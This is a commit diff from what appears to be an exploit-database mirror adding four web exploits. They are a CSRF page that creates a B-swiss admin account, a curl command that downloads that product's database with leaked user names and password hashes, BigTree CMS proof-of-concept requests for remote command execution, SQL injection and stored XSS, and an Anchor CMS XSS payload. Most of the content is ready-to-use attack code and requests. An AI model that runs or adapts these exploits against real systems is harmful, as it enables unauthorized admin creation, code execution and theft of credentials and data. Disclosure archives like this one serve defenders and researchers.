DB: 2020-09-26

4 changes to exploits/shellcodes BigTree CMS 4.4.10 - Remote Code Execution Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated) B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin) B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure
2020-09-26 05:02:04 +00:00 · 2020-09-26 05:02:04 +00:00 · 18829b7a22
commit 18829b7a22
parent 72506f63c2
5 changed files with 445 additions and 0 deletions
--- a/exploits/multiple/webapps/48833.txt
+++ b/exploits/multiple/webapps/48833.txt
@ -0,0 +1,207 @@
+# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)
+# Date: 2020-09-16
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.b-swiss.com
+# Version: 3.6.5
+Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
+
+<!--
+
+B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin
+
+
+Vendor: B-Swiss SARL | b-tween Sarl
+Product web page: https://www.b-swiss.com
+Affected version: 3.6.5
+                  3.6.2
+                  3.6.1
+                  3.6.0
+                  3.5.80
+                  3.5.40
+                  3.5.20
+                  3.5.00
+                  3.2.00
+                  3.1.00
+
+Summary: Intelligent digital signage made easy. To go beyond the
+possibilities offered, b-swiss allows you to create the communication
+solution for your specific needs and your graphic charter. You benefit
+from our experience and know-how in the realization of your digital
+signage project.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: Linux 5.3.0-46-generic x86_64
+           Linux 4.15.0-20-generic x86_64
+           Linux 4.9.78-xxxx-std-ipv6-64
+           Linux 4.7.0-040700-generic x86_64
+           Linux 4.2.0-27-generic x86_64
+           Linux 3.19.0-47-generic x86_64
+           Linux 2.6.32-5-amd64 x86_64
+           Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
+           macOS 10.13.5
+           Microsoft Windows 7 Business Edition SP1 i586
+           Apache/2.4.29 (Ubuntu)
+           Apache/2.4.18 (Ubuntu)
+           Apache/2.4.7 (Ubuntu)
+           Apache/2.2.22 (Win64)
+           Apache/2.4.18 (Ubuntu)
+           Apache/2.2.16 (Debian)
+           PHP/7.2.24-0ubuntu0.18.04.6
+           PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
+           PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
+           PHP/5.6.31
+           PHP/5.6.30-10+deb.sury.org~xenial+2
+           PHP/5.5.9-1ubuntu4.17
+           PHP/5.5.9-1ubuntu4.14
+           PHP/5.3.10
+           PHP/5.3.13
+           PHP/5.3.3-7+squeeze16
+           PHP/5.3.3-7+squeeze17
+           MySQL/5.5.49
+           MySQL/5.5.47
+           MySQL/5.5.40
+           MySQL/5.5.30
+           MySQL/5.1.66
+           MySQL/5.1.49
+           MySQL/5.0.77
+           MySQL/5.0.12-dev
+           MySQL/5.0.11-dev
+           MySQL/5.0.8-dev
+           phpMyAdmin/3.5.7
+           phpMyAdmin/3.4.10.1deb1
+           phpMyAdmin/3.4.7
+           phpMyAdmin/3.3.7deb7
+           WampServer 3.2.0
+           Acore Framework 2.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5589
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
+
+
+13.06.2020
+
+-->
+
+
+<html>
+  <body>
+  	<h1>CSRF Add b-swiss Maintenance Admin</h1>
+    <script>
+      function GodMode()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
+        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
+        xhr.withCredentials = true;
+        var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"locator\"\r\n" + 
+          "\r\n" + 
+          "Users.Save\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"page\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"sort\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"id\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"ischildgrid\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"inpopup\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"ongridpage\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rowid\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"preview_screenid\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_firstname\"\r\n" + 
+          "\r\n" + 
+          "TestingusF\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_lastname\"\r\n" + 
+          "\r\n" + 
+          "TestingusL\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_email\"\r\n" + 
+          "\r\n" + 
+          "aa@bb.cc\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_username\"\r\n" + 
+          "\r\n" + 
+          "testingus\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_password\"\r\n" + 
+          "\r\n" + 
+          "123456\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" + 
+          "\r\n" + 
+          "123456\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" + 
+          "\r\n" + 
+          "100000\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_status\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" + 
+          "\r\n" + 
+          "\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_language\"\r\n" + 
+          "\r\n" + 
+          "french-sw\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" + 
+          "\r\n" + 
+          "2\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + 
+          "Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" + 
+          "\r\n" + 
+          "1\r\n" + 
+          "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Press me" onclick="GodMode();" />
+    </form>
+  </body>
+</html>
--- a/exploits/multiple/webapps/48834.txt
+++ b/exploits/multiple/webapps/48834.txt
@ -0,0 +1,100 @@
+# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 -  Database Disclosure
+# Date: 2020-09-16
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.b-swiss.com
+# Version: 3.6.5
+# Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00
+
+B-swiss 3 Digital Signage System 3.6.5 Database Disclosure
+
+
+Vendor: B-Swiss SARL | b-tween Sarl
+Product web page: https://www.b-swiss.com
+Affected version: 3.6.5
+                  3.6.2
+                  3.6.1
+                  3.6.0
+                  3.5.80
+                  3.5.40
+                  3.5.20
+                  3.5.00
+                  3.2.00
+                  3.1.00
+
+Summary: Intelligent digital signage made easy. To go beyond the
+possibilities offered, b-swiss allows you to create the communication
+solution for your specific needs and your graphic charter. You benefit
+from our experience and know-how in the realization of your digital
+signage project.
+
+Desc: The application is vulnerable to unauthenticated database download
+and information disclosure vulnerability. This can enable the attacker to
+disclose sensitive information resulting in authentication bypass, session
+hijacking and full system control.
+
+Tested on: Linux 5.3.0-46-generic x86_64
+           Linux 4.15.0-20-generic x86_64
+           Linux 4.9.78-xxxx-std-ipv6-64
+           Linux 4.7.0-040700-generic x86_64
+           Linux 4.2.0-27-generic x86_64
+           Linux 3.19.0-47-generic x86_64
+           Linux 2.6.32-5-amd64 x86_64
+           Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
+           macOS 10.13.5
+           Microsoft Windows 7 Business Edition SP1 i586
+           Apache/2.4.29 (Ubuntu)
+           Apache/2.4.18 (Ubuntu)
+           Apache/2.4.7 (Ubuntu)
+           Apache/2.2.22 (Win64)
+           Apache/2.4.18 (Ubuntu)
+           Apache/2.2.16 (Debian)
+           PHP/7.2.24-0ubuntu0.18.04.6
+           PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
+           PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
+           PHP/5.6.31
+           PHP/5.6.30-10+deb.sury.org~xenial+2
+           PHP/5.5.9-1ubuntu4.17
+           PHP/5.5.9-1ubuntu4.14
+           PHP/5.3.10
+           PHP/5.3.13
+           PHP/5.3.3-7+squeeze16
+           PHP/5.3.3-7+squeeze17
+           MySQL/5.5.49
+           MySQL/5.5.47
+           MySQL/5.5.40
+           MySQL/5.5.30
+           MySQL/5.1.66
+           MySQL/5.1.49
+           MySQL/5.0.77
+           MySQL/5.0.12-dev
+           MySQL/5.0.11-dev
+           MySQL/5.0.8-dev
+           phpMyAdmin/3.5.7
+           phpMyAdmin/3.4.10.1deb1
+           phpMyAdmin/3.4.7
+           phpMyAdmin/3.3.7deb7
+           WampServer 3.2.0
+           Acore Framework 2.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5588
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php
+
+
+13.06.2020
+
+--
+
+
+$ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4
+
+INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES
+(1, 0, 0, 'Dusko', 'Dolgousko', 'duki@looney.tunes', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0),
+(3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1),
+(13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1),
+(14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1),
+(18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);
--- a/exploits/php/webapps/48831.txt
+++ b/exploits/php/webapps/48831.txt
@ -0,0 +1,95 @@
+# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution
+# Google Dork: " BigTree CMS "
+# Date: 2020-25-09
+# Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research)
+# Vendor Homepage: https://www.bigtreecms.org/
+# Software Link: https://www.bigtreecms.org/
+# Version: 4.4.10
+# Tested on: Windows
+# CVE : N/A
+
+## 1. Authenticated Remote Code Execution
+
+# Attack type: Remote
+# Impact: Remote arbitrary code execution
+# Affected component(s): /core/admin/field-types/list/draw.php
+# Attack vectors: Authenticated user (developer) can inject malicious command to the applications via crete new setting function:
+# Description: BigTree 4.4.10  and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE).
+# Severity (CVSS 3.1): Base Score: 9.1 CRITICAL
+# POC: Developer create setting and code will be executed when load settings:
+
+POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1
+Host: xxxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 388
+Origin: http://xxxx
+Connection: close
+Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/
+Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D
+Upgrade-Insecure-Requests: 1
+
+__csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p>
+
+# Video: https://vimeo.com/461667065
+
+## 2. Authenticated SQL Injection
+# Attack type: Remote
+#Impact: Authenticated SQl Injection in BigTree CMS
+# Attack vectors: Authenticated user (developer) can inject malicious SQL query to the applications via crete new feed function:
+# Affected component(s): /core/feeds/custom.php
+# Description:BigTree 4.4.10  and earlier are vulnerable to Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious sql query to the server and perform sql query.
+# Severity (CVSS 3.1): Base Score: 7.2 HIGH
+# POC: Request create or edit feed: 
+
+POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1
+Host: xxxx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 379
+Origin: http://xxxx
+Connection: close
+Referer: http://xxxx/site/index.php/admin/developer/feeds/add/
+Cookie: yyyy
+
+__csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12
+
+# Video: https://vimeo.com/461667107
+
+## 3. Authenticated Stored Cross-Site Scripting
+# Attack type: Remote
+# Impact: Stored XSS
+# Affected component(s): site/index.php/admin/pages/update
+# Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via crete or update page function:
+# Description: Stored XSS vulnerabilities in the BigTree 4.4.10  and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update
+# Severity (CVSS 3): Base Score: 6.5 MEDIUM
+# POC: Request create or edit page:
+
+POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1
+Host: xxxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368
+Content-Length: 12173
+Origin: http://xxx
+Connection: close
+Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/
+Cookie: yyyy
+
+---some fields here---
+
+<p>&nbsp;<span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p>
+<p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p>
+-----------------------------2320192840320212926996245368	
+
+---some fields here---
+
+# Video: https://vimeo.com/461667129
--- a/exploits/php/webapps/48832.txt
+++ b/exploits/php/webapps/48832.txt
@ -0,0 +1,39 @@
+# Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
+# Date: 2020-09-24
+# Exploit Author: Sinem Şahin
+# Vendor Homepage: https://anchorcms.com/
+# Version: 0.12.7
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Go to the following url. => http://(HOST)/admin/
+2- Login to admin panel.
+3- Press "Posts" button.
+4- Write XSS Payload into the description of the post.
+5- Press "Save" button.
+6- Go to the post.
+
+XSS Payload ==> "><script>alert("XSS")</script>
+
+==> HTTP Request <==
+
+POST /admin/posts/edit/1 HTTP/1.1
+Host: (HOST)
+Content-Length: 262
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Accept: /
+Origin: http://(HOST)/
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://(HOST)/admin/posts/edit/1
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: anchorcms=21cdfqefqwefl69ij8231
+Connection: close
+
+token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10
+&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40654,6 +40654,10 @@ id,file,description,date,author,type,platform,port
 48827,exploits/php/webapps/48827.txt,"Online Food Ordering System 1.0 - Remote Code Execution",2020-09-23,"Eren Şimşek",webapps,php,
 48829,exploits/php/webapps/48829.txt,"Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)",2020-09-24,Aporlorxl23,webapps,php,
 48830,exploits/php/webapps/48830.py,"Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting",2020-09-24,"Rahul Ramkumar",webapps,php,
+48831,exploits/php/webapps/48831.txt,"BigTree CMS 4.4.10 - Remote Code Execution",2020-09-25,SunCSR,webapps,php,
+48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,
+48833,exploits/multiple/webapps/48833.txt,"B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)",2020-09-25,LiquidWorm,webapps,multiple,
+48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 -  Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,